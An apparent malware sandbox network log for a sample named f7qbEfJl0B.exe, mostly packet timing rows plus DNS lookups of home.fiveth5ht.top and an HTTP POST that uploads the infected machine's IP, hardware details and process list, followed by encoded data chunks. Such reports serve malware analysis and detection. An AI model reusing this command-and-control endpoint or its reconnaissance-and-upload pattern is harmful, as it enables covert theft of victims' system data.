                                                          Dec 27, 2024 15:12:27.298046112 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298223019 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298228025 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298286915 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298341990 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298434973 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.298496008 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298511028 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298546076 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.298573017 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.298700094 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298705101 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298785925 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.298823118 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298830032 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.298887014 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.298932076 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299020052 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.299021006 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299129009 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299134016 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299237013 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299242020 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299370050 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299374104 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299411058 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299463987 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299509048 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299513102 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299614906 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299660921 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299762964 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299767971 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299885035 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299890041 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299987078 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.299992085 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300162077 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300165892 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300251961 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300256014 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300364017 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300369024 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300414085 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300417900 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300489902 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300523996 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300626993 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300631046 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300724983 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300729990 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300858974 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.300863028 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.415823936 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.415832996 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.415890932 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.415930986 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.416066885 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.416121006 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.416172981 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.416596889 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.416687965 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.418042898 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418046951 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418175936 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418215036 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418301105 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418402910 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418407917 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418416977 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418576956 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418581009 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418667078 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418672085 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418725014 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418791056 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418889999 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.418934107 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419008970 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419084072 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419260979 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419265985 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419400930 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419449091 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419529915 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419533968 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419609070 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419612885 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419629097 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419634104 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419715881 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419720888 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419884920 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.419898033 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420098066 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420103073 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420303106 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420425892 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420504093 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420516968 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420602083 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420607090 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420686007 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420730114 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420810938 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420814991 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420942068 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.420947075 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421094894 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421098948 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421242952 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421247005 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421314955 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421355009 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421359062 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421367884 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.421577930 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:27.536371946 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536384106 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536408901 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536415100 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536465883 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536472082 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536561012 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536566973 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536643982 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536649942 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536782980 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536788940 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536844015 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.536998987 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537004948 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537049055 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537055016 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537066936 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537108898 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537115097 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537199974 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537205935 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537277937 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537283897 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537344933 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537396908 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537477970 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537483931 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537633896 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537640095 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537693977 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537699938 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537714005 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537719011 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537816048 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537822008 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.537970066 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538011074 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538067102 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538072109 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538111925 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538117886 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538232088 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538237095 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538342953 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538348913 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538361073 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538454056 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538546085 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538587093 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538706064 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538717031 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538811922 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.538817883 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541177988 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541184902 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541295052 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541301012 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541434050 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541520119 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541526079 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541634083 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541640043 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541645050 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541774035 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541779995 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541868925 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.541874886 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542010069 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542016029 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542027950 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542043924 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542049885 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542119980 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542125940 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542218924 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542247057 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542336941 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542354107 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542465925 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542470932 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542574883 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542581081 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542601109 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542607069 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542623043 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542639971 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542682886 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542732954 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542787075 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542857885 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542947054 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542953014 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.542967081 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:27.543011904 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:59.126312971 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:59.126354933 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:59.126401901 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:59.126883030 CET4973180192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:59.246972084 CET80497315.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:59.874537945 CET4973880192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:59.994247913 CET80497385.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:12:59.994554996 CET4973880192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:12:59.994853020 CET4973880192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:13:00.114532948 CET80497385.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:13:03.199084044 CET80497385.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:13:03.199187994 CET80497385.101.3.217192.168.2.4
                                                          Dec 27, 2024 15:13:03.199434042 CET4973880192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:13:03.199919939 CET4973880192.168.2.45.101.3.217
                                                          Dec 27, 2024 15:13:03.319348097 CET80497385.101.3.217192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 27, 2024 15:12:21.331129074 CET6507353192.168.2.41.1.1.1
                                                          Dec 27, 2024 15:12:21.331202984 CET6507353192.168.2.41.1.1.1
                                                          Dec 27, 2024 15:12:21.469212055 CET53650731.1.1.1192.168.2.4
                                                          Dec 27, 2024 15:12:21.629281044 CET53650731.1.1.1192.168.2.4
                                                          Dec 27, 2024 15:12:25.476310968 CET6507653192.168.2.41.1.1.1
                                                          Dec 27, 2024 15:12:25.476473093 CET6507653192.168.2.41.1.1.1
                                                          Dec 27, 2024 15:12:25.614955902 CET53650761.1.1.1192.168.2.4
                                                          Dec 27, 2024 15:12:25.884612083 CET53650761.1.1.1192.168.2.4
                                                          Dec 27, 2024 15:12:59.730788946 CET5868553192.168.2.41.1.1.1
                                                          Dec 27, 2024 15:12:59.730859041 CET5868553192.168.2.41.1.1.1
                                                          Dec 27, 2024 15:12:59.873262882 CET53586851.1.1.1192.168.2.4
                                                          Dec 27, 2024 15:12:59.873282909 CET53586851.1.1.1192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 27, 2024 15:12:21.331129074 CET192.168.2.41.1.1.10xd87cStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                          Dec 27, 2024 15:12:21.331202984 CET192.168.2.41.1.1.10x4a57Standard query (0)httpbin.org28IN (0x0001)false
                                                          Dec 27, 2024 15:12:25.476310968 CET192.168.2.41.1.1.10x9249Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                          Dec 27, 2024 15:12:25.476473093 CET192.168.2.41.1.1.10x8126Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                          Dec 27, 2024 15:12:59.730788946 CET192.168.2.41.1.1.10xb348Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                          Dec 27, 2024 15:12:59.730859041 CET192.168.2.41.1.1.10xc66eStandard query (0)home.fiveth5ht.top28IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 27, 2024 15:12:21.629281044 CET1.1.1.1192.168.2.40xd87cNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                          Dec 27, 2024 15:12:21.629281044 CET1.1.1.1192.168.2.40xd87cNo error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                          Dec 27, 2024 15:12:25.614955902 CET1.1.1.1192.168.2.40x9249No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                          Dec 27, 2024 15:12:59.873262882 CET1.1.1.1192.168.2.40xb348No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • httpbin.org
                                                          • home.fiveth5ht.top

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.4497315.101.3.217807252C:\Users\user\Desktop\f7qbEfJl0B.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 27, 2024 15:12:26.007304907 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 442896
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 33 37 33 35 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317137350", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                                                          Dec 27, 2024 15:12:26.127171040 CET4944OUTData Raw: 74 67 48 67 76 57 5a 58 4a 33 52 32 39 70 71 4d 6c 31 71 76 68 47 5a 45 54 4b 50 66 36 78 34 69 38 4e 43 53 52 51 79 32 55 61 79 62 49 5c 2f 4d 79 54 78 6b 34 4b 7a 52 71 47 49 72 34 5c 2f 49 35 54 61 39 6e 5c 2f 62 57 46 68 53 6f 79 58 57 63 38
                                                          Data Ascii: tgHgvWZXJ3R29pqMl1qvhGZETKPf6x4i8NCSRQy2UaybI\/MyTxk4KzRqGIr4\/I5Ta9n\/bWFhSoyXWc8Xga+YYLDQSs3PGYnDq2uvLLl97PvALxCyWMp4bD5bxHCmr1f8AV\/GVK1eL+zCngczwuV5hi6ktVGGBwmKldWaTlHm+OqK7rxl8MviB8PXiHjPwhrmgW9zKYbHU7yxkbQ9VdU8wnRtft\/P0TWowmW87Sr+8hwr\/
                                                          Dec 27, 2024 15:12:26.127204895 CET2472OUTData Raw: 7a 49 2b 33 5c 2f 41 4e 62 5c 2f 41 44 7a 69 68 5a 6c 38 74 4e 6e 7a 75 59 68 46 2b 38 6c 5c 2f 66 5c 2f 36 59 50 54 5c 2f 50 6f 42 51 66 75 5c 2f 66 6a 64 50 38 41 6c 72 35 63 76 6b 5a 37 39 73 5c 2f 6d 50 54 36 55 41 45 6e 79 5c 2f 66 54 66 5c
                                                          Data Ascii: zI+3\/ANb\/ADzihZl8tNnzuYhF+8l\/f\/6YPT\/PoBQfu\/fjdP8Alr5cvkZ79s\/mPT6UAEny\/fTf\/wBteT\/nmq0cnl7\/AN9v+n7iD3\/yePrVltjf7D\/8tePyyfp\/9fvUX+r37Hk8n\/yB\/n6Gg6CPzC+xH49fL\/x5\/wA80OH9I+v+seUeR9PXFPaN32I\/3\/N\/dXP+o\/z75\/8Ar1E33nR3\/wC2n4UAQL
                                                          Dec 27, 2024 15:12:26.127243996 CET2472OUTData Raw: 42 34 6b 38 64 66 38 45 74 76 69 39 70 66 67 6d 32 52 62 6e 55 74 52 38 48 5c 2f 47 44 77 7a 38 51 76 46 74 6e 70 35 54 7a 6a 64 52 2b 41 64 4a 38 45 32 4f 71 7a 79 77 32 36 74 4c 64 32 38 74 33 61 43 7a 59 47 4f 36 6e 69 49 4c 56 79 6e 37 43 2b
                                                          Data Ascii: B4k8df8Etvi9pfgm2RbnUtR8H\/GDwz8QvFtnp5TzjdR+AdJ8E2Oqzyw26tLd28t3aCzYGO6niILVyn7C+k+D\/2a\/wBjDxn+3x8a5J\/Fvxc+MnhnXvj58WvHRt7S+8T6jo2qXV1qfhPwT4blcwxadZ3lnJpJi0iOWx08a\/qYt7jytO0zTI9P8m+GX\/BYP4t33jD4N6t8cP2TdR+GH7Pv7QfilfC\/w2+J9nr2o6nMs13qc
                                                          Dec 27, 2024 15:12:26.127291918 CET2472OUTData Raw: 46 59 73 64 75 7a 36 5c 2f 35 5c 2f 44 6a 5c 2f 4a 70 6b 72 66 75 39 37 5c 2f 41 50 66 7a 5c 2f 50 54 6e 48 2b 46 54 66 36 7a 2b 50 5c 2f 74 6e 5c 2f 77 44 57 5c 2f 6c 5c 2f 4b 6d 4d 4e 30 6a 76 73 6a 78 5c 2f 6e 38 4f 65 66 5c 2f 41 4e 64 42 6f
                                                          Data Ascii: FYsduz6\/5\/Dj\/Jpkrfu97\/APfz\/PTnH+FTf6z+P\/tn\/wDW\/l\/KmMN0jvsjx\/n8Oef\/ANdBoVtu6Pk+X2ii83\/l4\/H+nftULfIqO6ZTr5nlfj\/+qrSHb+7\/AOmXm+Zz\/n\/PSkb\/AFn+wYv9XHn\/AD270GlPr8v1K23+Pp6eZL+NVm\/hfMYf\/W\/5\/n\/k1ZZd3A+d+IopOvnfY\/T8PypjR8v\/AB\
                                                          Dec 27, 2024 15:12:26.127306938 CET2472OUTData Raw: 66 58 33 70 2b 31 4a 46 32 66 36 6d 47 50 5c 2f 6e 70 46 5c 2f 6a 2b 76 70 33 6f 6a 6a 64 6d 64 45 68 32 4f 50 33 50 2b 73 5c 2f 7a 7a 36 63 65 6c 54 37 58 7a 6c 5c 2f 58 7a 41 68 2b 53 50 59 5c 2f 37 7a 39 33 2b 39 7a 4a 5c 2f 71 4a 76 38 5c 2f
